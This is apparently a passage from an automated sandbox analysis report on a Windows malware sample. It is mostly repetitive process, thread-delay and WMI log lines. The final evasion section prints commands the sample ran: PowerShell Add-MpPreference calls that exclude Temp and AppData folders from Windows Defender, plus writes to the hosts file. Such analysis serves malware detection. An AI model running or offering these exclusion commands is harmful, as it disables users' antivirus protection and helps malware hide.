Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\whoami.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\whoami.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\whoami.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\whoami.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4720Thread sleep count: 6104 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4720Thread sleep count: 2838 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5684Thread sleep time: -8301034833169293s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5648Thread sleep count: 1369 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5648Thread sleep count: 6848 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6412Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6180Thread sleep count: 5602 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6628Thread sleep count: 2735 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5848Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4548Thread sleep count: 5180 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4548Thread sleep count: 3331 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7080Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6920Thread sleep count: 5450 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6092Thread sleep count: 3003 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6180Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4060Thread sleep count: 4727 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4060Thread sleep count: 3458 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 720Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6104Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2838Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1369
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6848
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5602
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2735
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5180
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3331
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5450
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3003
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4727
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3458
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\attrib.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeFile opened: PHYSICALDRIVE0Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe, 00000000.00000002.564099859.0000000000CE8000.00000004.00000020.sdmp, acrotray.exe, 00000029.00000002.562719738.0000000000BB8000.00000004.00000020.sdmp, acrotray.exe, 00000045.00000002.560875709.00000000000BF000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\whoami.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\whoami.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

barindex
Modifies the hosts fileShow sources
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
Adds a directory exclusion to Windows DefenderShow sources
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\whoami.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\whoami.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\TempJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
